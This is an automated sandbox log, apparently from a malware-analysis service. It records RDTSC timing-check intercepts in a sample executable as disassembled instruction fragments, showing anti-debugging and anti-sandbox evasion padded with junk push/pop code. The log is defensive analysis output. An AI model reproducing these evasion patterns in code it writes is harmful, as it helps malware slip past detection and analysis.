Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F550CB second address: F550D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F569AB second address: F569F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB10h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FF34080AB10h 0x00000012 jmp 00007FF34080AB0Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007FF34080AB12h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FF34080AB0Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F558EF second address: F558F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F558F4 second address: F558FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F582F3 second address: F582F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F582F7 second address: F5835B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FF34080AB08h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jmp 00007FF34080AB12h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FF34080AB08h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5835B second address: F58365 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F58365 second address: F5836A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5836A second address: F58370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5BFCD second address: F5BFDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FF34080AB0Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5A261 second address: F5A26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5BFDD second address: F5BFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5BFE9 second address: F5BFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5DA0E second address: F5DA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5DA12 second address: F5DA23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 jng 00007FF3408102FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6158C second address: F61592 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F61592 second address: F61598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F61598 second address: F6159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6159C second address: F61633 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b ja 00007FF340810306h 0x00000011 push 00000000h 0x00000013 je 00007FF340810303h 0x00000019 jmp 00007FF3408102FDh 0x0000001e sub dword ptr [ebp+122D3542h], ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007FF3408102F8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov dword ptr [ebp+12452F13h], ecx 0x00000046 jng 00007FF3408102FCh 0x0000004c xor edi, 345547FBh 0x00000052 jmp 00007FF340810306h 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jnc 00007FF3408102F6h 0x00000061 pushad 0x00000062 popad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6250C second address: F62512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62512 second address: F62516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62516 second address: F62577 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FF34080AB08h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D37F6h], edx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF34080AB08h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 movzx ebx, ax 0x00000048 push 00000000h 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62577 second address: F6257B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6257B second address: F62581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62581 second address: F62587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62587 second address: F6258B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F64461 second address: F644C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FF3408102F8h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FF3408102F8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D2B82h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FF3408102F8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+12484291h], edx 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F636B7 second address: F636BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F636BB second address: F63715 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D38A5h], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, edx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 add di, 5C19h 0x00000028 mov eax, dword ptr [ebp+122D0C55h] 0x0000002e mov dword ptr [ebp+122D184Eh], edi 0x00000034 push FFFFFFFFh 0x00000036 add edi, 568EA3B1h 0x0000003c mov ebx, dword ptr [ebp+122D1BEFh] 0x00000042 nop 0x00000043 pushad 0x00000044 jmp 00007FF340810302h 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop esi 0x0000004d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F63715 second address: F63719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F64667 second address: F64682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810307h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F65748 second address: F6574C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6660F second address: F66614 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F66614 second address: F66621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6A3A3 second address: F6A3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6B48D second address: F6B491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C3E5 second address: F6C3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C3EC second address: F6C403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C403 second address: F6C407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C407 second address: F6C40B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F694AD second address: F694B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6A5FB second address: F6A606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D314 second address: F6D319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C5B9 second address: F6C5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C5BF second address: F6C5C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D3CE second address: F6D3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C662 second address: F6C666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C666 second address: F6C66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D530 second address: F6D5C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF340810303h 0x0000000f nop 0x00000010 cmc 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f jmp 00007FF340810300h 0x00000024 mov eax, dword ptr [ebp+122D0A19h] 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FF3408102F8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 movzx edi, ax 0x00000047 push FFFFFFFFh 0x00000049 mov dword ptr [ebp+12460B3Fh], ebx 0x0000004f mov ebx, dword ptr [ebp+1245A942h] 0x00000055 nop 0x00000056 pushad 0x00000057 pushad 0x00000058 push eax 0x00000059 pop eax 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D5C0 second address: F6D5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D5D0 second address: F6D5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6E5D6 second address: F6E5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6E5DA second address: F6E5E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6E5E4 second address: F6E5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6E691 second address: F6E697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F7052D second address: F70532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0B81D second address: F0B828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF3408102F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0B828 second address: F0B82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0B82E second address: F0B861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF340810308h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF3408102FAh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0B861 second address: F0B88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB15h 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007FF34080AB06h 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007FF34080AB06h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79AE2 second address: F79AEF instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79AEF second address: F79AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79AF6 second address: F79B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3408102FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F791E3 second address: F791EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F791EB second address: F791EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F791EF second address: F791F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F791F5 second address: F791FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F793A1 second address: F793BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB15h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F793BA second address: F793D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF3408102FAh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FF3408102F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79512 second address: F79516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79516 second address: F7951A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F7968A second address: F79692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F7E7D5 second address: F7E7DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F7E90A second address: F7E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83B95 second address: F83B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83B99 second address: F83BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FF34080AB06h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83BA7 second address: F83BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82885 second address: F82889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EB3 second address: F82EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EB7 second address: F82EC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EC1 second address: F82EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EC5 second address: F82EE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007FF34080AB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF34080AB0Fh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EE6 second address: F82EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83618 second address: F83629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FF34080AB0Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83629 second address: F8363F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF340810301h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F837AE second address: F837B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F837B4 second address: F837B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F837B8 second address: F837E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 jnc 00007FF34080AB06h 0x00000017 jmp 00007FF34080AB0Ch 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jc 00007FF34080AB06h 0x00000025 rdtsc
